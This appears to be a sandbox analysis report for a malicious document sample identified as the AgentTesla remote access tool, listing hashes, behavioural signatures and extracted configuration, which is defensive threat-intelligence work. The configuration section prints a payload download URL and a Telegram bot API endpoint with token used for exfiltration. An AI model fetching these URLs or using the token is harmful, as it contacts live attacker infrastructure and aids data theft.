General
-
Target
has been verified. However PDF, IMG, xlsx, .docx.doc
-
Size
10KB
-
Sample
230126-jzzqxaee2z
-
MD5
107fe2ac90955572fd89d53510ca9242
-
SHA1
6a461ca59b3b132459447b5a975830f6617e5471
-
SHA256
a99b49f2067ae486a530b63a38cc373ed8d28c0e7f60d5b24e4fc3e0fe60f677
-
SHA512
1b3bd3a46e52e52ddc5436c88a00d4a82c6a151ff30faad6f76c7417ce46b46da1fcdc6e45d6942d8c978c4abc6354da6fd483ddcadb737e4a296d89fb60a08a
-
SSDEEP
192:ScIMmtP8ar5G/bfIdTO5namWBX8ex6y3wrN:SPXt4ATO5nosMwZ
Static task
static1
Behavioral task
behavioral1
Sample
has been verified. However PDF, IMG, xlsx, .docx
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
has been verified. However PDF, IMG, xlsx, .docx
Resource
win10v2004-20220812-en
Malware Config
Extracted
http://1234567890OOOOOOOOOOOOOOOOOOOOOOO@2454098344/000000000_OOOOOOOO_ooooooo_ooOOOOOOO_OOOOO/OOOOOOOOO_OOOOOOO_OOO.doc
Extracted
agenttesla
https://api.telegram.org/bot5940813834:AAF8mKehOQ2jtgluy4NISP8DYRvxgz__xCQ/
Targets
-
-
Target
has been verified. However PDF, IMG, xlsx, .docx.doc
-
Size
10KB
-
MD5
107fe2ac90955572fd89d53510ca9242
-
SHA1
6a461ca59b3b132459447b5a975830f6617e5471
-
SHA256
a99b49f2067ae486a530b63a38cc373ed8d28c0e7f60d5b24e4fc3e0fe60f677
-
SHA512
1b3bd3a46e52e52ddc5436c88a00d4a82c6a151ff30faad6f76c7417ce46b46da1fcdc6e45d6942d8c978c4abc6354da6fd483ddcadb737e4a296d89fb60a08a
-
SSDEEP
192:ScIMmtP8ar5G/bfIdTO5namWBX8ex6y3wrN:SPXt4ATO5nosMwZ
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext
-